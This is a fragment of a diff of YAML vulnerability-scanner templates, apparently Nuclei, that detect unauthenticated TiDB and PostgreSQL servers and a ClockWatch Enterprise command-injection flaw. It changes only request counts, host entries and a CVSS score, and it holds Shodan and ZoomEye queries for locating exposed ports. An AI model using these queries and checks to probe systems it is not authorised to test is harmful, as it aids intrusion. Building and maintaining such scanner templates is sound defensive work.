matchers:
- type: word

4
network/misconfig/tidb-unauth.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: TiDB server was able to be accessed because no authentication was required.
metadata:
max-request: 2
max-request: 1
zoomeye-query: tidb +port:"4000"
tags: network,tidb,unauth,misconfig
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:4000"
port: 4000
read-size: 1024

4
network/misconfig/unauth-psql.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://www.postgresql.org/docs/9.6/auth-methods.html
metadata:
max-request: 2
max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
verified: "true"
tags: network,postgresql,db,unauth,misconfig
@ -24,7 +24,7 @@ tcp:
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:5432"
port: 5432
matchers-condition: and
matchers:

8
network/vulnerabilities/clockwatch-enterprise-rce.yaml
View File

@ -10,11 +10,11 @@ info:
- https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cvss-score: 10
cwe-id: CWE-77
tags: clockwatch,rce,network
metadata:
max-request: 2
max-request: 1
tags: clockwatch,rce,network
tcp:
- inputs:
@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:1001"
port: 1001
matchers-condition: and
matchers:

Some files were not shown because too many files have changed in this diff Show More